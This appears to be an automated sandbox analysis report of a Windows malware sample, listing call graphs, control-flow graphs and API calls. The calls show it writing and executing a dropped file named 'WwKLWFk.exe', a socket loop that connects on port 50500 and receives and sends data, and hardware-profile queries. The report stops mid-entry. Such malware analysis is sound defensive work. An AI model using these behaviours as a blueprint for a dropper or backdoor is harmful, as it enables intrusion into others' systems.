23711 ee5a60 23681->23711 23728 e9e460 6 API calls 23681->23728 23683 e9db98 23682->23683 23685 e9dc56 23682->23685 23684 e9dc24 socket 23683->23684 23683->23685 23684->23685 23686 e9dc3a connect 23684->23686 23685->23672 23686->23685 23687 e9dc4c closesocket 23686->23687 23687->23684 23687->23685 23729 f5c32a 23688->23729 23690 e94a9b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23690->23672 23692 ee5a60 2 API calls 23691->23692 23695 e9e0aa 23692->23695 23694 e9e204 23696 e9e44b 23694->23696 23698 e9e22e 23694->23698 23736 ee58e0 23695->23736 23741 f61e70 RtlAllocateHeap ___std_exception_copy __Getctype 23696->23741 23699 ee8330 2 API calls 23698->23699 23701 e9e26e std::locale::_Locimp::_Locimp 23698->23701 23699->23701 23704 e9e3b7 23701->23704 23705 e9e393 WSASend 23701->23705 23703 e9e423 23703->23672 23704->23703 23742 f61e70 RtlAllocateHeap ___std_exception_copy __Getctype 23704->23742 23705->23701 23705->23704 23707 ee8377 23706->23707 23709 ee8348 std::locale::_Setgloballocale 23706->23709 23744 eeb6b0 23707->23744 23709->23673 23710 ee838a 23710->23673 23712 ee5a8a 23711->23712 23713 ee5a9b 23712->23713 23714 ee5b42 23712->23714 23716 ee5aa7 std::locale::_Locimp::_Locimp 23713->23716 23717 ee5acc 23713->23717 23720 ee5b0e 23713->23720 23721 ee5b05 23713->23721 23778 e82040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23714->23778 23716->23681 23722 f5c950 std::_Facet_Register 2 API calls 23717->23722 23718 ee5b47 23779 e81fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23718->23779 23725 f5c950 std::_Facet_Register 2 API calls 23720->23725 23726 ee5ae6 std::locale::_Locimp::_Locimp 23720->23726 23721->23717 23721->23718 23723 ee5adf 23722->23723 23723->23726 23780 f61e70 RtlAllocateHeap ___std_exception_copy __Getctype 23723->23780 23725->23726 23726->23681 23728->23681 23732 f5c92a 23729->23732 23733 f5c338 23732->23733 23734 f5c93b GetSystemTimePreciseAsFileTime 23732->23734 23733->23690 23734->23733 23737 ee5911 23736->23737 23738 ee58ee 23736->23738 23737->23694 23738->23737 23743 f61e70 RtlAllocateHeap ___std_exception_copy __Getctype 23738->23743 23745 eeb7fc 23744->23745 23746 eeb6d5 23744->23746 23767 e82040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23745->23767 23750 eeb736 23746->23750 23752 eeb6ea 23746->23752 23753 eeb743 23746->23753 23748 eeb801 23768 e81fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23748->23768 23750->23748 23750->23752 23759 f5c950 23752->23759 23755 f5c950 std::_Facet_Register 2 API calls 23753->23755 23758 eeb6fa std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 23753->23758 23755->23758 23757 eeb7ba std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 23757->23710 23758->23757 23769 f61e70 RtlAllocateHeap ___std_exception_copy __Getctype 23758->23769 23761 f5c955 std::_Facet_Register 23759->23761 23762 f5c96f 23761->23762 23764 e81fa0 Concurrency::cancel_current_task 23761->23764 23771 f6b5ec 23761->23771 23762->23758 23763 f5c97b 23763->23763 23764->23763 23770 f5dd11 RtlAllocateHeap RtlAllocateHeap ___std_exception_destroy ___std_exception_copy 23764->23770 23766 e81fe3 23766->23758 23767->23748 23768->23758 23770->23766 23776 f744ed __dosmaperr std::_Facet_Register 23771->23776 23772 f7452b 23777 f6a8ff RtlAllocateHeap __dosmaperr 23772->23777 23774 f74516 RtlAllocateHeap 23775 f74529 23774->23775 23774->23776 23775->23761 23776->23772 23776->23774 23777->23775 23778->23718 23779->23723 23905 efc6a0 RtlAllocateHeap 23783 f62a20 23786 f6295e 23783->23786 23785 f62a32 23789 f6296a std::_Locinfo::_Locinfo_dtor 23786->23789 23787 f62971 23804 f6a8ff RtlAllocateHeap __dosmaperr 23787->23804 23789->23787 23791 f62991 23789->23791 23790 f62976 23805 f61e60 RtlAllocateHeap ___std_exception_copy 23790->23805 23793 f62996 23791->23793 23794 f629a3 23791->23794 23806 f6a8ff RtlAllocateHeap __dosmaperr 23793->23806 23800 f73d48 23794->23800 23797 f629ac 23799 f62981 23797->23799 23807 f6a8ff RtlAllocateHeap __dosmaperr 23797->23807 23799->23785 23801 f73d54 std::_Lockit::_Lockit std::_Locinfo::_Locinfo_dtor 23800->23801 23808 f73dec 23801->23808 23803 f73d6f 23803->23797 23804->23790 23805->23799 23806->23799 23807->23799 23812 f73e0f 23808->23812 23810 f73e70 23818 f74473 RtlAllocateHeap __dosmaperr 23810->23818 23813 f73e55 23812->23813 23814 f73ab3 23812->23814 23813->23803 23817 f73ac0 __dosmaperr std::_Facet_Register 23814->23817 23815 f73aeb RtlAllocateHeap 23816 f73afe __dosmaperr 23815->23816 23815->23817 23816->23810 23817->23815 23817->23816 23818->23813 23906 e94ab0 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23821 f662a8 23822 f662bb ___std_exception_copy 23821->23822 23827 f66183 23822->23827 23824 f662c7 23834 f61b9c RtlAllocateHeap ___std_exception_copy 23824->23834 23826 f662d3 23828 f6618f std::_Locinfo::_Locinfo_dtor 23827->23828 23829 f66199 23828->23829 23830 f661bc 23828->23830 23849 f61de3 RtlAllocateHeap ___std_exception_copy __Getctype 23829->23849 23832 f661b4 23830->23832 23835 f6621a 23830->23835 23832->23824 23834->23826 23836 f66227 23835->23836 23837 f6624a 23835->23837 23861 f61de3 RtlAllocateHeap ___std_exception_copy __Getctype 23836->23861 23839 f62c91 4 API calls 23837->23839 23847 f66242 23837->23847 23840 f66262 23839->23840 23850 f744ad 23840->23850 23843 f73642 RtlAllocateHeap 23844 f66276 23843->23844 23854 f720ff 23844->23854 23847->23832 23849->23832 23851 f744c4 23850->23851 23852 f6626a 23850->23852 23851->23852 23863 f74473 RtlAllocateHeap __dosmaperr 23851->23863 23852->23843 23855 f6627d 23854->23855 23856 f72128 23854->23856 23855->23847 23862 f74473 RtlAllocateHeap __dosmaperr 23855->23862 23857 f72177 23856->23857 23859 f7214f 23856->23859 23868 f61de3 RtlAllocateHeap ___std_exception_copy __Getctype 23857->23868 23864 f7206e 23859->23864 23861->23847 23862->23847 23863->23852 23865 f7207a std::_Locinfo::_Locinfo_dtor 23864->23865 23867 f720b9 23865->23867 23869 f721d2 23865->23869 23867->23855 23868->23855 23870 f77d9e RtlAllocateHeap 23869->23870 23871 f721e2 23870->23871 23872 f7221a 23871->23872 23874 f77d9e RtlAllocateHeap 23871->23874 23879 f721e8 23871->23879 23875 f77d9e RtlAllocateHeap 23872->23875 23872->23879 23876 f72211 23874->23876 23877 f72226 FindCloseChangeNotification 23875->23877 23878 f77d9e RtlAllocateHeap 23876->23878 23877->23879 23878->23872 23881 f77d0d RtlAllocateHeap __dosmaperr 23879->23881 23880 f72240 23880->23867 23881->23880 23914 f6a828 SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23889 59b0573 GetCurrentHwProfileW 23932 e88b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23933 e9a100 7 API calls 3 library calls 23915 59b0561 GetCurrentHwProfileW

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 1431044-1431074 GetPEB 1 1431077-143109a 0->1 2 143109d-14310a0 1->2 3 14310a6-14310bc 2->3 4 14311ee-143122b CreateFileA 2->4 5 1431110-1431116 3->5 6 14310be-14310c5 3->6 28 1431265-1431269 4->28 29 143122d-1431230 4->29 9 1431129-143112f 5->9 10 1431118-143111f 5->10 6->5 7 14310c7-14310ce 6->7 7->5 11 14310d0-14310d7 7->11 13 1431131-1431138 9->13 14 1431148-143114e 9->14 10->9 12 1431121-1431124 10->12 11->5 18 14310d9-14310dd 11->18 20 14311bb-14311c0 12->20 13->14 15 143113a-1431141 13->15 16 1431150-1431157 14->16 17 1431167-143116f 14->17 15->14 21 1431143-1431146 15->21 16->17 24 1431159-1431160 16->24 25 1431171-1431178 17->25 26 1431188-143118e 17->26 18->5 27 14310df-14310e3 18->27 22 14311c2-14311c5 20->22 23 14311e0-14311e9 20->23 21->20 22->23 30 14311c7-14311ca 22->30 23->2 24->17 31 1431162-1431165 24->31 25->26 32 143117a-1431181 25->32 34 1431190-1431197 26->34 35 14311a7-14311ad 26->35 27->20 33 14310e9-143110b 27->33 36 1431232-1431238 29->36 30->23 39 14311cc-14311cf 30->39 31->20 32->26 40 1431183-1431186 32->40 33->1 34->35 41 1431199-14311a0 34->41 35->20 42 14311af-14311b6 35->42 37 1431246-1431252 WriteFile 36->37 38 143123a-1431242 36->38 45 1431255-1431262 FindCloseChangeNotification WinExec 37->45 38->36 44 1431244 38->44 39->23 46 14311d1-14311d4 39->46 40->20 41->35 48 14311a2-14311a5 41->48 42->20 43 14311b8 42->43 43->20 44->45 45->28 46->23 49 14311d6-14311d9 46->49 48->20 49->23 50 14311db-14311de 49->50 50->4 50->23
                                    APIs
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 01431223
                                    • WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 01431252
                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 01431256
                                    • WinExec.KERNEL32(?,00000005), ref: 01431262
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 2234911746-1035807574
                                    • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction ID: 2e3781faf35d3ef84e58d02f9f1e922f4b611042d24c1e318ac52093f0cf5c55
                                    • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction Fuzzy Hash: 2C611975D012159BCF25CF98C884AEEFBB0BB8CB15F14826BD505A7321C7709A81CB95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 102 e9db60-e9db92 WSAStartup 103 e9db98-e9dbc2 call e87d20 * 2 102->103 104 e9dc66-e9dc6f 102->104 109 e9dbce-e9dc14 103->109 110 e9dbc4-e9dbc8 103->110 112 e9dc60-e9dc65 109->112 113 e9dc16-e9dc1c 109->113 110->104 110->109 112->104 114 e9dc1e 113->114 115 e9dc74-e9dc7e 113->115 116 e9dc24-e9dc38 socket 114->116 115->112 120 e9dc80-e9dc88 115->120 116->112 118 e9dc3a-e9dc4a connect 116->118 121 e9dc4c-e9dc54 closesocket 118->121 122 e9dc70 118->122 121->116 123 e9dc56-e9dc5a 121->123 122->115 123->112
                                    APIs
                                    • WSAStartup.WS2_32 ref: 00E9DB8B
                                    • socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 00E9DC2D
                                    • connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 00E9DC41
                                    • closesocket.WS2_32(00000000), ref: 00E9DC4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startupclosesocketconnectsocket
                                    • String ID: 50500
                                    • API String ID: 3098855095-2230786414
                                    • Opcode ID: 983f1cfdb41abde6b824678953e2cfdaca2026b49a4d02cbf7f4486641137ea5
                                    • Instruction ID: 5d3696a90d7410c58d479641f6a5a8e9cad631f2a93e1ed03c2ee1953aa7a625
                                    • Opcode Fuzzy Hash: 983f1cfdb41abde6b824678953e2cfdaca2026b49a4d02cbf7f4486641137ea5
                                    • Instruction Fuzzy Hash: A931C4715093156BCA209B288C85B6BF7E5FFC9738F112B19F9A8A31D0E370A8048692

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 278 59b056a-59b07d3 308 59b07de-59b0800 GetCurrentHwProfileW 278->308 310 59b080a-59b08c0 308->310 316 59b08c2-59b0902 call 59b0907 310->316 322 59b0904-59b0a9b call 59b0aa2 316->322 344 59b0acd-59b0b79 322->344 345 59b0a9d 322->345
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 7fada92473ace338daa87fc03698fcbbbcbbbbc48f556f30f8551e7558de7ec3
                                    • Instruction ID: a82ca0559196b4e6ce0c5e294c707f1323669e1fe2807c8801c452ba274bb442
                                    • Opcode Fuzzy Hash: 7fada92473ace338daa87fc03698fcbbbcbbbbc48f556f30f8551e7558de7ec3
                                    • Instruction Fuzzy Hash: 7561A0EB14C111FDB102C1826B9CAFBAB6FE6D67707308D66F407D6A02E3D44B895532
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 61c183259b93884bcfa47a0767191a5a905a6007295b620a572094c65bcaf61a
                                    • Instruction ID: 85298f52e5f4e7e319a4a9a24c62a16a8b3499d10145e28642cf1f9fb8c3a62a
                                    • Opcode Fuzzy Hash: 61c183259b93884bcfa47a0767191a5a905a6007295b620a572094c65bcaf61a
                                    • Instruction Fuzzy Hash: BC417DEB54D121BCB112C5912BACAFB6B6FE6D77303308C66F407D6906E3D84B8A5171

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 51 e9ec20-e9ec58 52 e9f0bf-e9f0d3 51->52 53 e9ec5e 51->53 54 e9ec64-e9ec6c 53->54 55 e9ec6e-e9ec94 call e9db60 54->55 56 e9eca7-e9ecf0 setsockopt recv 54->56 58 e9ec99-e9eca1 55->58 56->52 61 e9ecf6-e9ecf9 56->61 58->56 60 e9f0aa-e9f0b9 Sleep 58->60 60->52 60->54 62 e9ecff-e9ed53 call ee8330 recv 61->62 63 e9f037-e9f053 call e94a90 61->63 71 e9ed59-e9ed74 recv 62->71 72 e9efe4-e9eff1 62->72 69 e9f09c-e9f0a4 Sleep 63->69 70 e9f055 63->70 69->60 73 e9f05f-e9f086 call e9e060 70->73 74 e9f057-e9f05d 70->74 71->72 75 e9ed7a-e9edb1 71->75 72->69 77 e9eff7-e9f003 72->77 80 e9f08b-e9f097 73->80 74->69 74->73 78 e9edb3-e9ee11 call ee8330 recv 75->78 79 e9ee14-e9ee44 call ee5a60 75->79 81 e9f019-e9f023 call f5cbd1 77->81 82 e9f005-e9f013 77->82 78->79 89 e9ee4a 79->89 90 e9ef64-e9efb3 call e9e460 79->90 80->69 81->69 82->81 93 e9ee50-e9ef5e 89->93 90->72 96 e9efb5-e9efc4 90->96 93->90 98 e9efda-e9efe1 call f5cbd1 96->98 99 e9efc6-e9efd4 96->99 98->72 99->98
                                    APIs
                                    • setsockopt.WS2_32(0000037C,0000FFFF,00001006,?,00000008), ref: 00E9ECC7
                                    • recv.WS2_32(?,00000004,00000002), ref: 00E9ECE1
                                    • recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 00E9ED4E
                                    • recv.WS2_32(00000000,0000000C,00000008), ref: 00E9ED6F
                                    • recv.WS2_32(00000000,?,00000008), ref: 00E9EE0C
                                      • Part of subcall function 00E9DB60: WSAStartup.WS2_32 ref: 00E9DB8B
                                      • Part of subcall function 00E9DB60: socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 00E9DC2D
                                      • Part of subcall function 00E9DB60: connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 00E9DC41
                                      • Part of subcall function 00E9DB60: closesocket.WS2_32(00000000), ref: 00E9DC4D
                                    • recv.WS2_32(?,00000004,00000008), ref: 00E9F033
                                    • Sleep.KERNELBASE(00000001), ref: 00E9F09E
                                    • Sleep.KERNELBASE(00000064), ref: 00E9F0AC
                                    • __Mtx_unlock.LIBCPMT ref: 00E9F211
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: recv$Sleep$Mtx_unlockStartupclosesocketconnectsetsockoptsocket
                                    • String ID: 50500
                                    • API String ID: 2930922264-2230786414
                                    • Opcode ID: 3220bf851cab40ca656752feb9b7fe662b457098c6e57f8964c7c56e06a73dfa
                                    • Instruction ID: f2f7ae08472281b050ade4911c3efe2141b6650b5702cbc76aba9fc5fc08b15c
                                    • Opcode Fuzzy Hash: 3220bf851cab40ca656752feb9b7fe662b457098c6e57f8964c7c56e06a73dfa
                                    • Instruction Fuzzy Hash: 7CB1AC31D00248DFEF24DBA8CC85BADBBB5FB45314F648369E444B7292D774A9858F90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 124 e9e060-e9e0af call ee5a60 127 e9e0b5-e9e0b8 124->127 128 e9e1d4-e9e20a call ee58e0 124->128 129 e9e0c0-e9e0e6 127->129 137 e9e238-e9e26c call e87d20 128->137 138 e9e20c-e9e218 128->138 131 e9e0f8-e9e107 129->131 132 e9e0e8-e9e0f3 129->132 135 e9e109-e9e112 131->135 136 e9e117-e9e123 131->136 134 e9e1c7 132->134 139 e9e1ca-e9e1ce 134->139 135->134 140 e9e133-e9e13f 136->140 141 e9e125-e9e12e 136->141 154 e9e26e-e9e280 137->154 155 e9e282-e9e28a call ee8330 137->155 142 e9e21a-e9e228 138->142 143 e9e22e-e9e235 call f5cbd1 138->143 139->128 139->129 145 e9e14c-e9e158 140->145 146 e9e141-e9e14a 140->146 141->134 142->143 147 e9e44b call f61e70 142->147 143->137 150 e9e15a-e9e163 145->150 151 e9e165-e9e171 145->151 146->134 158 e9e450-e9e455 call f61e70 147->158 150->134 159 e9e17e-e9e18a 151->159 160 e9e173-e9e17c 151->160 156 e9e28f-e9e2e2 call e87d20 * 2 154->156 155->156 172 e9e2e4-e9e313 call e87d20 call f5e630 156->172 173 e9e316-e9e32c call e87d20 156->173 163 e9e18c-e9e195 159->163 164 e9e197-e9e1a3 159->164 160->134 163->134 167 e9e1b0-e9e1b9 164->167 168 e9e1a5-e9e1ae 164->168 167->139 169 e9e1bb-e9e1c3 167->169 168->134 169->134 172->173 179 e9e332-e9e338 173->179 180 e9e3b7 173->180 181 e9e340-e9e36c 179->181 182 e9e3bb-e9e3c1 180->182 184 e9e370-e9e37b 181->184 185 e9e3eb-e9e403 182->185 186 e9e3c3-e9e3cf 182->186 184->184 189 e9e37d-e9e3ab WSASend 184->189 187 e9e435-e9e44a 185->187 188 e9e405-e9e411 185->188 190 e9e3e1-e9e3e8 call f5cbd1 186->190 191 e9e3d1-e9e3df 186->191 192 e9e42b-e9e432 call f5cbd1 188->192 193 e9e413-e9e421 188->193 201 e9e3ad-e9e3b5 189->201 202 e9e425-e9e429 189->202 190->185 191->158 191->190 192->187 193->158 195 e9e423 193->195 195->192 201->180 201->181 202->182
                                    APIs
                                    • WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00F84438,00000000,00000000,-00FB65B0), ref: 00E9E3A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Send
                                    • String ID: 131$50500$Ws2_32.dll
                                    • API String ID: 121738739-3512819870
                                    • Opcode ID: d606e65e1e44160b9dfef8c4133a13068b9c966dac467be5f9b8ece88cd9e711
                                    • Instruction ID: 42fbc8a77bf0656328b4ad5b5ab199a7120f24a7b289c7170161e9ae3699fa29
                                    • Opcode Fuzzy Hash: d606e65e1e44160b9dfef8c4133a13068b9c966dac467be5f9b8ece88cd9e711
                                    • Instruction Fuzzy Hash: 8CD1DE31A04248DFDF18CFA8CC51BEDBBF1AF06314F684258D955BB292E7709886CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 203 59b0573-59b07d3 232 59b07de-59b0800 GetCurrentHwProfileW 203->232 234 59b080a-59b08c0 232->234 240 59b08c2-59b0902 call 59b0907 234->240 246 59b0904-59b0a9b call 59b0aa2 240->246 268 59b0acd-59b0b79 246->268 269 59b0a9d 246->269
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 1779de93eeb7398281cbfdeb0e8cd37eadc253443ac77cba179b1292aa31e308
                                    • Instruction ID: e051512c5d25e1d976c57fdd8c8b6213974a5b65c921c1bddf0472bb10f0e070
                                    • Opcode Fuzzy Hash: 1779de93eeb7398281cbfdeb0e8cd37eadc253443ac77cba179b1292aa31e308
                                    • Instruction Fuzzy Hash: D661BFEB54C111FDB202D1926B9CAFBAB6FE6D67707308C66F407D6902E3D84B891132

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 354 59b05c5-59b07d3 379 59b07de-59b0800 GetCurrentHwProfileW 354->379 381 59b080a-59b08c0 379->381 387 59b08c2-59b0902 call 59b0907 381->387 393 59b0904-59b0a9b call 59b0aa2 387->393 415 59b0acd-59b0b79 393->415 416 59b0a9d 393->416
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 702301de202712047281c3325d116e65ed26ee6a69703b0082e8a58e5fd1968f
                                    • Instruction ID: 78572aae8ba8e0667f1ef71afffc6e244a195d3fa2d8de7c321d07a7f1485615
